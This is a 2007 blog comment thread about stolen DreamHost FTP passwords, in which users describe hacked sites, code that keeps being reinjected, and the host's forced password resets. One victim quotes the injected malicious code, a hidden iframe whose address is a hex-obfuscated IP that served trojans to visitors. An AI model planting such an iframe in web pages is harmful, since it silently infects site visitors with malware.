Comments on: DreamHost FTP Accounts Hacked

By: bilgisayar-destek » 3500 DreamHost Müşterisinin Şifreleri Çalındı!

bilgisayar-destek » 3500 DreamHost Müşterisinin Şifreleri Çalındı! — Thu, 19 Jul 2007 22:11:50 +0000

[...] Dreamhost blogunda, son iki haftada 3500 DreamHost’çunun FTP şifrelerinin çalındığı haberi yer aldı.Dreamhost ekibi, şifre çalınmasıyla ilgili olarak kullanıcılara bir e-mail gönderdi. [...]

By: Neuville

Neuville — Sat, 07 Jul 2007 07:58:36 +0000

Hello There,
I’m not with dreamhost, but my website was hacked exactly the same way.i’m hosted at Aruba, an italian provider, and running wordpress.

The hacks happen since I upgrade to wp 2.2.1

Any idea on how to solve? I’ve deleted the hack lines on the index.php yesterday night, but this morning they were there again. I’ve already asked to change my ftp password and waiting a response from the people at Aruba

By: Unofficial DreamHost Blog » Blog Archive » DreamHost Newsletter - July 2007

Wed, 04 Jul 2007 08:35:13 +0000

[...] Hack Explanation Latest info about the compromised FTP passwords in the blog. Apparently the main problem was users using FTP (which is an unencrypted protocol) [...]

By: Unofficial DreamHost Blog

Unofficial DreamHost Blog — Fri, 22 Jun 2007 11:45:43 +0000

fuck dreamhost - If your password has been compromised I think it is very responsible to close access to your FTP account. It was always warned about on the status blog:

We are now forcing all of the affected users who have not yet changed their passwords to do so before they will be able to upload anything again. This is necessary so we can continue to monitor the situation and see clearly what’s going on.

By: fuck dreamhost

fuck dreamhost — Wed, 20 Jun 2007 18:57:46 +0000

they also manually close your ftp and http without warning!!!

By: Tim

Tim — Tue, 12 Jun 2007 01:25:55 +0000

Looks like DreamHost upgraded the WebFTP (which is located with the panel for your domain).

By: Daniel

Daniel — Fri, 08 Jun 2007 11:00:39 +0000

It would be nice if we had a list of the hacked server names…

By: danielsemper

danielsemper — Fri, 08 Jun 2007 03:34:59 +0000

I suffered form 2 different changes.

1.- The spam links
2.- An IFRAME code that goes to a web page with trojans and viruses that made my friends reinstall Windows. You have a Black screen after you open the page with IE6 and thats it.

The code inserted in my index.html and index.php files was this one:

IFRAME src='http://0xcb.0xdf.0x9e.0x0c/t' width='6' height='6' style='visibility: hidden;'>

So this action is not for PR, is just evil.

By: Will

Will — Fri, 08 Jun 2007 00:57:10 +0000

They’ve also removed the password from being shown when you click on a user. However, the one for the mysql user is still shown.

By: Mike

Mike — Thu, 07 Jun 2007 08:32:23 +0000

Just a quick note:

approximately 3,500 DreamHost users have had their FTP account passwords stolen

To avoid confusion with the DH wording:

approximately 3,500 separate FTP accounts

Keep in mind that an L4 account can have up to 775 FTP users and even the L1 plan can have up to 75. I think many people are taking the 3,500 number as the number of customers affected.

Just something to consider, especially since a lot of people resell on DH and could be running 1 domain per FTP user. Then add in those that create users for friends, family members, etc… or even just different users for their own domains.

Personally, I’m more disturbed by them having panel access, than I am by the FTP stats… but that’s just me.